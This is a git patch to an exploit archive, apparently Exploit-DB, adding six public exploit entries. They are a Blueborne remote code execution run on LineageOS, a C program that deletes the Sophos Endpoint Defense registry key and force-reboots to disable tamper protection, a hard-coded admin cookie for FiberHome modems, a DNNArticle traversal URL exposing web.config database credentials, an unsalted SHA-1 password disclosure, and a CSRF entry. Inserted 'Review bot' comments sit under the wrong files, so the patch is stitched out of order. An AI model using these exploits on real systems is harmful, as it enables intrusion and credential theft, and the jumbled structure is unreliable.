From 4088e4151bb6d9255196fed4db6c1243751c3308 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 7 Apr 2018 05:01:44 +0000
Subject: [PATCH] DB: 2018-04-07
6 changes to exploits/shellcodes
Sophos Endpoint Protection 10.7 - Tamper-Protection Bypass
Sophos Endpoint Protection Control Panel 10.7 - Weak Password Encryption
LineageOS 14.1 Blueborne - Remote Code Execution
FiberHome VDSL2 Modem HG 150-UB - Authentication Bypass
DotNetNuke DNNarticle Module 11 - Directory Traversal
Cobub Razor 0.7.2 - Cross Site Request Forgery
---
 exploits/android/remote/44415.txt | 86 +++++++++++++++++++++
 exploits/hardware/webapps/44413.txt | 55 ++++++++++++++
 exploits/php/webapps/44416.txt | 22 ++++++
 exploits/windows/local/44410.txt | 111 ++++++++++++++++++++++++++++
 exploits/windows/local/44411.txt | 90 ++++++++++++++++++++++
 exploits/windows/webapps/44414.txt | 66 +++++++++++++++++
 files_exploits.csv | 6 ++
 7 files changed, 436 insertions(+)
 create mode 100644 exploits/android/remote/44415.txt
 create mode 100644 exploits/hardware/webapps/44413.txt
 create mode 100644 exploits/php/webapps/44416.txt
 create mode 100644 exploits/windows/local/44410.txt
 create mode 100644 exploits/windows/local/44411.txt
 create mode 100644 exploits/windows/webapps/44414.txt
diff --git a/exploits/android/remote/44415.txt b/exploits/android/remote/44415.txt
new file mode 100644
index 000000000..856d1dc59
--- /dev/null
+++ b/exploits/android/remote/44415.txt
@@ -0,0 +1,86 @@ +# Exploit Title: LineageOS 14.1 (Android 7.1.2) Blueborne RCE CVE-2017-0781 +# Date: 04/01/2018 +# Exploit Author: Marcin Kozlowski +# Tested on: LinageOS 14.1 (Android 7.1.2) without BlueBorne Patch +# CVE : CVE-2017-0781 + +# Provided for legal security research and testing purposes ONLY. + +Code in exp4.py + +More info in Repo: + +https://github.com/marcinguy/android712-blueborne + +Sample Execution: + +$python exp4.py hci0 84:55:A5:B6:6F:F6 +[*] Pwn attempt 0: +[*] Set hci0 to new rand BDADDR 16:e1:66:a7:8a:3d +[↘] Doing stack memeory leak... +00: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 +00000000 +01: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 +00000000 +02: 00000000 00000000 00000000 ad0911c4 9a2ed2c8 00000018 00000044 acf3de5d +acf4d67d +03: acf475e1 ad0911c4 a7c61ac0 16e166a7 00008a3d 00000000 b4300500 b4300970 +1187a437 +04: 00000000 9a2ed2a8 000003f3 00020001 9a2e0700 acfac80a b2f1fee0 ad08fb74 +b5215a97 +05: b4300500 b4300970 b2f1d220 00000000 00000001 b5225001 1187a437 00000000 +00000000 +06: a7c38bc0 aa5753c0 aa5753c8 b2f79360 00000008 00000000 b5233a89 00000001 +00000000 +07: 00000000 00000000 ad08fb74 acf61330 1187a437 00000008 a7c38bc0 b2f79360 +acfc9968 +08: b2f79360 00000000 a7c0f0e8 a7c38bc0 b2f79360 acfc9968 acf588f7 00000000 +a7c38bc0 +09: a7c00000 b4300500 00000003 a7c63b60 a7c00000 b4300500 b4300a78 aa5753c8 +a7c63b60 +10: ad0911c4 ad08fb74 b5225d3b 00000063 aa5753c8 b4300500 00000000 aa5753c8 +b5225d67 +11: acf3e0f5 ad07a770 00000000 a7c63b60 00000013 b5235ad5 00000063 a7c63b60 +b4300500 +12: b4300970 b2f1d418 00000000 00000001 b5225001 1187a437 a7c63b60 00000044 +00000013 +13: 00000000 00000044 a7c63b60 ad0911c4 ad08fb74 acf3df91 00000040 a7c63b70 +00000000 +14: acf472db a7c0fa24 b5225d3b 0000001d aa5753c8 b4300500 00000000 aa5753c8 +b5225d67 +15: 9a2ed4b0 a7c0f778 0000000f b2f1d298 00000000 b5235ad5 0000001d b2f1d298 +aa5753c8 +16: 00000000 9a2ed8d8 00000000 
9a2ed4b0 b5235d03 00000000 9a2ed4b0 1187a437
+00000008
+17: b2f1d430 1187a437 a7c0f250 b2f1d298 9a2ed8d8 b51ea361 00000001 00000000
+a7c0f778
+18: 1187a437 9a2ed8d8 acf59793 1187a437 a7c0f780 00000001 a7c0fa18 9a2ed8d8
+00000000
+19: 9a2ed4b0 a7c0f778 a7c0fa24 acf58f85 00000001 0000003e a7c0fa18 00000000
+00000005
+[*] LIBC 0xb51ea361
+[*] BT 0xacf4d67d
+[*] libc_base: 0xb5142000, bss_base: 0xacece000
+[*] system: 0xb5216b4d, acl_name: 0xad08160c
+[*] Set hci0 to new rand BDADDR e3:83:0c:ab:03:c6
+[*] system 0xb5216b4d
+[*] PAYLOAD "\x17\xaa\xaaAAAAMk!\xb5";
+ touch /data/local/tmp/test
+ #
+[+] Connecting to BNEP again: Done
+[+] Pwning...: Done
+[*] Looks like it didn't crash. Possibly worked
+
+
+Payload executed:
+
+s3ve3g:/ # ls -la /data/local/tmp/
+
+total 24
+drwxrwxrwx 2 shell shell 4096 2014-01-13 02:05 .
+drwxr-x--x 3 root root 4096 2014-01-22 00:36 ..
+-rw------- 1 root root 5773 2018-03-25 12:51 apt.conf.owMBvd
+-rw------- 1 root root 1182 2018-03-25 12:51 apt.data.HdUevr
+-rw------- 1 root root 455 2018-03-25 12:51 apt.sig.kv2PHc
+-rw------- 1 1002 1002 0 2014-01-13 02:05 test
+s3ve3g:/ #
\ No newline at end of file
diff --git a/exploits/hardware/webapps/44413.txt b/exploits/hardware/webapps/44413.txt
new file mode 100644
index 000000000..fa086d874
--- /dev/null
+++ b/exploits/hardware/webapps/44413.txt
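Review bot: The directory listing at the end of the hunk shows the payload's `test` file owned by uid/gid 1002 rather than root, so the injected command ran in the Bluetooth stack's process context, not as root, even though the surrounding `#` prompt comes from a separate root shell; the header should say so, e.g. `# Privileges: code execution as the bluetooth process user (uid 1002 in the listing), not root`. The `libc_base`/`bss_base` values are derived from the leaked `LIBC`/`BT` stack words on each run, but the offsets used to reach `system` are presumably specific to this firmware build and should be documented as such. `[*] Looks like it didn't crash. Possibly worked` means the script has no positive success check, so readers must confirm the side effect on the device as the transcript does. `Tested on: LinageOS` is a misspelling of `LineageOS`.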
@@ -0,0 +1,55 @@
+# Exploit Title: FiberHome VDSL2 Modem HG 150-UB Authentication Bypass
+# Date: 04/03/2018
+# Exploit Author: Noman Riffat
+# Vendor Homepage: http://www.fiberhome.com/
+# CVE : CVE-2018-9248, CVE-2018-9248
+
+The vulnerability exists in plain text & hard coded cookie. Using any
+cookie manager extension, an attacker can bypass login page by setting the
+following Master Cookie.
+
+Cookie: Name=0admin
+
+Then access the homepage which will no longer require authentication.
+http://192.168.10.1/
+
+Due to improper session implementation, there is another way to bypass
+login. The response header of homepage without authentication looks like
+this.
+
+HTTP/1.1 200 Ok
+Server: micro_httpd
+Cache-Control: no-cache
+Date: Tue, 03 Apr 2018 18:33:12 GMT
+Set-Cookie: Name=; path=/
+Content-Type: text/html
+Connection: close
+
+HTTP/1.1 200 Ok
+Server: micro_httpd
+Cache-Control: no-cache
+Date: Tue, 03 Apr 2018 18:33:12 GMT
+Content-Type: text/html
+Connection: close
+
+
+
+.. continue to actual homepage source
+
+The response header looks totally messed up and by triggering burp suite
+and modifying it to following will grant access to homepage without
+authentication.
+
+HTTP/1.1 200 Ok
+Server: micro_httpd
+Cache-Control: no-cache
+Date: Tue, 03 Apr 2018 18:33:12 GMT
+Set-Cookie: Name=; path=/
+Content-Type: text/html
+Connection: close
+
+
+
+.. continue to actual homepage source
\ No newline at end of file
diff --git a/exploits/php/webapps/44416.txt b/exploits/php/webapps/44416.txt
new file mode 100644
index 000000000..facc0d5d9
--- /dev/null
+++ b/exploits/php/webapps/44416.txt
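Review bot: The header `# CVE : CVE-2018-9248, CVE-2018-9248` lists the same identifier twice; if the hard-coded `Name=0admin` cookie and the session-handling issue received separate CVEs the second one is missing, otherwise the duplicate should be dropped. The second "bypass" also does not look like a distinct server-side flaw from what the transcript shows: the unauthenticated response already carries the full homepage body after the doubled `HTTP/1.1 200 Ok` header block, so editing that response in Burp only changes what the attacker's own browser renders. A more precise statement would be `The device returns the full homepage source to an unauthenticated request; the login redirect is enforced only by the Set-Cookie: Name= response and client-side handling`, hedged as an observation from the captured response since the firmware's CGI source is not shown. The doubled status line is itself worth calling out as the CGI emitting two header blocks.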
@@ -0,0 +1,22 @@
+# Exploit Title: [Cobub Razor 0.7.2 Cross Site Request Forgery]
+# Date: [2018-03-07]
+# Exploit Author: [ppb(ppb@5ecurity.cn)]
+# Vendor Homepage: [https://github.com/cobub/razor/]
+# Software Link: [https://github.com/cobub/razor/]
+# Version: [0.72]
+# CVE : [CVE-2018-7746]
+
+There is a vulnerability. Authentication is not required for /index.php?/manage/channel/modifychannel. For example, with a crafted channel name, stored XSS is triggered during a later /index.php?/manage/channel request by an admin.
+
+
+
+
+
+ + + + +
+
+
\ No newline at end of file
diff --git a/exploits/windows/local/44410.txt b/exploits/windows/local/44410.txt
new file mode 100644
index 000000000..eb8571a13
--- /dev/null
+++ b/exploits/windows/local/44410.txt
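Review bot: The description states that authentication is not required for `/index.php?/manage/channel/modifychannel`, which makes this a missing-authorization bug whose consequence is stored XSS rather than a CSRF; the title `Cobub Razor 0.7.2 Cross Site Request Forgery` and the `# Version: [0.72]` line (which disagrees with the title's `0.7.2`) should be reconciled with that. The proof of concept itself is absent: every line after the description is an empty `+` line, which suggests the HTML form was stripped when the advisory was rendered, so the entry currently gives a reader no reproducible request. Adding the raw request, `POST /index.php?/manage/channel/modifychannel` with the crafted channel-name parameter and the admin page that later renders it, would make the finding verifiable.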
@@ -0,0 +1,111 @@
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/SOPHOS-ENDPOINT-PROTECTION-v10.7-TAMPER-PROTECTION-BYPASS-CVE-2018-4863.txt
+[+] ISR: Apparition Security
+
+
+
+Vendor:
+=============
+www.sophos.com
+
+
+
+Product:
+===========
+Sophos Endpoint Protection v10.7
+
+Sophos Endpoint Protection helps secure your workstation by adding prevention, detection, and response technology on top of your operating system.
+Sophos Endpoint Protection is designed for workstations running Windows and macOS. It adds exploit technique mitigations, CryptoGuard anti-ransomware,
+anti-malware, web security, malicious traffic detection, and deep system cleanup.
+
+
+
+Vulnerability Type:
+===================
+Tamper Protection Bypass
+
+
+CVE Reference:
+==============
+CVE-2018-4863
+
+
+Security Issue:
+================
+Sophos Endpoint Protection offers an enhanced tamper protection mechanism disallowing changes to be made to the Windows registry
+by creating and setting a special registry key "SEDEnabled" as follows:
+
+HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos Endpoint Defense\TamperProtection\Config
+Create the following registry key:
+"SEDEnabled"=dword:00000001"
+
+From "https://community.sophos.com/kb/en-us/124376" documentation:
+"You must enable the basic Tamper Protection feature on an endpoint in order to use the Enhanced Tamper Protection"
+
+However, this protection mechanism can be bypassed by deleting the following registry key as it is not sufficiently protected.
+"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Sophos Endpoint Defense\"
+
+By deleting this key this bypasses the Sophos Endpoint "Enhanced Tamper Protection" once the system has been rebooted.
+Attackers can then create arbitrary registry keys or edit keys and settings under the protected "tamper" protection config key.
+The issue undermines the integrity of the endpoint protection as deleting this key stops the tamper protect driver from loading.
+
+
+SAV OPM customers are unaffected from 10.8.1 onwards, all Central managed customers customers are unaffected.
+All SAV OPM Preview subscribers have had the fix since 2018-03-01.
+
+
+
+Exploit/POC:
+=============
+Compile the below malicious POC "C" code and run on target, PC will reboot then we pwn.
+
+gcc -o sophos-poc.exe sophos-poc.c
+
+"sophos-poc.c"
+
+/***SOPHOS ANTIVIRUS ENDPOINT ENHANCED TAMPER PROTECTION BYPASS
+Even with "SEDEnabled"=dword:00000001" set in registry to prevent tampering
+https://community.sophos.com/kb/en-us/124376
+By hyp3rlinx **/
+
+int main(void){
+ system("reg delete \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Sophos Endpoint Defense\" /f");
+ system("shutdown -t 0 -r -f");
+return 0;
+}
+
+
+
+Network Access:
+===============
+Local
+
+
+
+Severity:
+=========
+High
+
+
+
+Disclosure Timeline:
+=============================
+Vendor Notification: December 4, 2017
+Vendor Acknowledgement: December 12, 2017
+Vendor release fixes: March 1, 2018
+Vendor request additional time before disclosing.
+additional time has passed.
+April 4, 2018 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere.
All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/windows/local/44411.txt b/exploits/windows/local/44411.txt
new file mode 100644
index 000000000..479e79e1b
--- /dev/null
+++ b/exploits/windows/local/44411.txt
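Review bot: The PoC in the Exploit/POC section calls `system()` without `#include <stdlib.h>`, so the `gcc -o sophos-poc.exe sophos-poc.c` build relies on an implicit declaration that current GCC and Clang reject by default; `#include <stdlib.h>` should be the first line of `sophos-poc.c`. The advisory also never states the privilege required: deleting a key under `HKLM\SYSTEM\CurrentControlSet\services` needs administrator rights under default Windows ACLs, so the finding is that the tamper protection does not hold against a local administrator, and `Network Access: Local` should be qualified with `Requires: local administrator`. For defenders the technique is loud — deletion of the `Sophos Endpoint Defense` service key immediately followed by `shutdown -t 0 -r -f` — and is a reasonable detection rule. The `"SEDEnabled"=dword:00000001"` line also carries an unmatched trailing quote.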
@@ -0,0 +1,90 @@
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/SOPHOS-ENDPOINT-PROTECTION-CONTROL-PANEL-v10.7-INSECURE-CRYPTO-CVE-2018-9233.txt
+[+] ISR: Apparition Security
+
+
+
+Vendor:
+==========
+www.sophos.com
+
+
+
+Product:
+===========
+Sophos Endpoint Protection - Control Panel v10.7
+
+Sophos Endpoint Protection helps secure your workstation by adding prevention, detection, and response technology on top of your operating system.
+Sophos Endpoint Protection is designed for workstations running Windows and macOS. It adds exploit technique mitigations, CryptoGuard anti-ransomware,
+anti-malware, web security, malicious traffic detection, and deep system cleanup.
+
+
+
+Vulnerability Type:
+===================
+Insecure Crypto
+
+
+
+CVE Reference:
+==============
+CVE-2018-9233
+
+
+
+Security Issue:
+================
+Sophos endpoint protection control panel authentication uses weak unsalted unicoded cryptographic hash (SHA1) function, not using salt allows attackers that gain access to hash
+ability to conduct faster cracking attacks using pre-computed dictionaries, e.g. rainbow tables. This can potentially result in unauthorized access that could allow for
+changing of settings, whitelist or unquarantine files.
+
+Password and config for Sophos endpoint protection control panel is stored here:
+C:\ProgramData\Sophos\Sophos Anti-Virus\Config\machine.xml
+
+e.g.
+
+SHA1 (Unicode) encoding non salted pass = abc123
+
+
+true689307D2FC53AF0FB941BC1BB42737CE4F3EF540
+
+
+
+Using PHP's sha1 function with "mb_convert_encoding" as UTF-16LE we can verify.
+
+C:\>php -r "print sha1(mb_convert_encoding('abc123', 'UTF-16LE', 'UTF-8'));"
+689307d2fc53af0fb941bc1bb42737ce4f3ef540
+
+
+
+Network Access:
+===============
+Local
+
+
+
+Severity:
+=========
+Low
+
+
+Disclosure Timeline:
+=============================
+Vendor Notification: December 4, 2017
+Vendor Acknowledgement: December 12, 2017
+Vendor request additional time before disclosing.
+additional time has passed.
+April 4, 2018 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/windows/webapps/44414.txt b/exploits/windows/webapps/44414.txt
new file mode 100644
index 000000000..68ff07aef
--- /dev/null
+++ b/exploits/windows/webapps/44414.txt
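Review bot: The Security Issue section frames the weakness as "no salt, so rainbow tables", but the verification command shows a single unsalted SHA-1 over the UTF-16LE password with no work factor at all, which means a GPU cracker brute-forces short and dictionary passwords directly without needing precomputed tables; the advisory should say so and name the remediation, e.g. `store a per-password salt and use a slow KDF (PBKDF2, bcrypt or Argon2) instead of raw SHA-1`. Actual exposure depends on who can read `C:\ProgramData\Sophos\Sophos Anti-Virus\Config\machine.xml`, which the text never states, and `Severity: Low` is justified only if that file is readable solely by administrators — that assumption should be made explicit. The `true689307D2...` line has lost its XML element names in this rendering, so the element that holds the hash should be named in prose.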
@@ -0,0 +1,66 @@
+ ##############################
+
+01. ### Advisory Information ###
+Title: Directory Traversal Vulnerability in DNNarticle module
+Date published: n/a
+Date of last update: n/a
+Vendors contacted: zldnn.com
+Discovered by: Esmaeil Rahimian
+Severity: Critical
+
+02. ### Vulnerability Information ###
+
+OVE-ID: CVE-2018-9126.
+
+03. ### Introduction ###
+
+DNN Article is not only a powerful module to enable post and manage
+articles, but also provides total solutions for content management. Content
+such as articles, news, announcements, product catalogs, etc can be
+organized into unlimited levels of categories. New content can be moderated
+before published. The administrator can assign roles as moderator. Also an
+email can be sent when new content is added. Visitors can make comment and
+rating. They can also agree or disagree an article. The product supports
+common features of DotNetNuke module such as localization, portable
+interface, search, Syndication etc. It can integrate with Twitter,
+Facebook, Google Map, Windows Live Writer and DotNetNuke Journal to provide
+more powerful functions for your portals. DNNArticle is an extendable
+system. There are several sub modules shipped with DNNArticle standard
+edition to provide rich and attractive look and feel experiences. There are
+also several optional sub modules that provide more features. And the
+number of optional sub modules is growing continually. There are also
+several applications based on DNNArticle such as DNNArticle Blog and
+DNNArticle Product. DNNArticle fully supports template and CSS theme. This
+feature provides more flexibility for users to build more attractive user
+interface.
+
+zldnn.com
+
+04. ### Vulnerability Description ###
+
+The DNNArticle module 11 for DNN (formerly DotNetNuke) allows remote
+attackers to read the web.config file, and consequently
+discover database credentials, via the /GetCSS.ashx/?CP=%2fweb.config URI.
+
+
+05.
### Technical Description / Proof of Concept Code ###
+desktopmodules/DNNArticle/GetCSS.ashx/?CP=%2fweb.config&smid=512&portalid=3
+with this link the attacker can see the web.config file and find DB name
+and see the user name and passwords of DB
+
+06. ### Affected Product Code Base ###
+DnnArticle Module for DotNet Nuke - 11
+Affected Component:
+DNNArticle Module
+[Attack Type]
+Remote
+[Impact Information Disclosure]
+True
+[Attack Vectors]
+Attacker can see the web.config file that contain critical information
+06. ### Credits ###
+
+SecureHost[Research Team] - www.securehost.co
+
+This vulnerability has been discovered by:
+Esmaeil Rahimian - [www.securehost.co] - Rahimian(at)SecureHost(dot)co
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index c0e3b7236..8d3edd7a2 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
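Review bot: The PoC URL `desktopmodules/DNNArticle/GetCSS.ashx/?CP=%2fweb.config&smid=512&portalid=3` carries `smid` and `portalid` values that belong to the author's instance, and the text does not say whether the handler requires them or ignores them, while section 04 gives the shorter `/GetCSS.ashx/?CP=%2fweb.config` form — the two should be reconciled so a reader knows which request to send. The root cause is not described either; from the PoC it looks like `CP` is mapped to a server path without being confined to the module's stylesheet directory, but that is an inference since the handler source is not shown. A remediation line such as `resolve CP against the module's CSS folder and reject any value that escapes it (path separators, .., absolute paths)`, plus the defensive note that an encrypted `connectionStrings` section limits what a web.config read yields, would help both vendors and defenders. `OVE-ID:` in section 02 is a typo for `CVE-ID:`, and the section number `06.` is used twice.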
@@ -9633,6 +9633,8 @@ id,file,description,date,author,type,platform,port
 44365,exploits/windows/local/44365.py,"Allok WMV to AVI MPEG DVD WMV Converter 4.6.1217 - Buffer Overflow",2018-03-30,"Mohan Ravichandran and Velayutham Selvaraj",local,windows,
 44382,exploits/windows/local/44382.py,"Faleemi Windows Desktop Software - (DDNS/IP) Local Buffer Overflow",2018-03-30,"Himavanth Reddy",local,windows,
 44389,exploits/windows/local/44389.txt,"WebLog Expert Enterprise 9.4 - Privilege Escalation",2018-04-02,bzyo,local,windows,
+44410,exploits/windows/local/44410.txt,"Sophos Endpoint Protection 10.7 - Tamper-Protection Bypass",2018-04-06,hyp3rlinx,local,windows,
+44411,exploits/windows/local/44411.txt,"Sophos Endpoint Protection Control Panel 10.7 - Weak Password Encryption",2018-04-06,hyp3rlinx,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
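Review bot: The description on the added `44411` row, `Weak Password Encryption`, mislabels the finding: the referenced advisory documents an unsalted SHA-1 hash of the control-panel password, not encryption, so the row should read `"Sophos Endpoint Protection Control Panel 10.7 - Unsalted Password Hash (SHA-1)"` to match what the entry demonstrates and to keep the index searchable by the right term. The `44410` row agrees with its advisory.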
@@ -16378,6 +16380,7 @@ id,file,description,date,author,type,platform,port
 44357,exploits/windows/remote/44357.rb,"Exodus Wallet (ElectronJS Framework) - Remote Code Execution (Metasploit)",2018-03-29,Metasploit,remote,windows,
 44376,exploits/windows/remote/44376.py,"Advantech WebAccess < 8.1 - webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow",2018-03-30,"Chris Lyne",remote,windows,4592
 44398,exploits/hardware/remote/44398.py,"Moxa AWK-3131A 1.4 < 1.7 - 'Username' OS Command Injection",2017-04-03,Talos,remote,hardware,
+44415,exploits/android/remote/44415.txt,"LineageOS 14.1 Blueborne - Remote Code Execution",2018-04-06,"Marcin Kozlowski",remote,android,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39107,3 +39110,6 @@ id,file,description,date,author,type,platform,port
 44406,exploits/php/webapps/44406.txt,"Z-Blog 1.5.1.1740 - Cross-Site Scripting",2018-04-05,zzw,webapps,php,
 44407,exploits/php/webapps/44407.txt,"Z-Blog 1.5.1.1740 - Full Path Disclosure",2018-04-05,zzw,webapps,php,
 44408,exploits/php/webapps/44408.txt,"GetSimple CMS 3.3.13 - Cross-Site Scripting",2018-04-05,"Sureshbabu Narvaneni",webapps,php,
+44413,exploits/hardware/webapps/44413.txt,"FiberHome VDSL2 Modem HG 150-UB - Authentication Bypass",2018-04-06,"Noman Riffat",webapps,hardware,
+44414,exploits/windows/webapps/44414.txt,"DotNetNuke DNNarticle Module 11 - Directory Traversal",2018-04-06,"Esmaeil Rahimian",webapps,windows,
+44416,exploits/php/webapps/44416.txt,"Cobub Razor 0.7.2 - Cross Site Request Forgery",2018-04-06,ppb,webapps,php,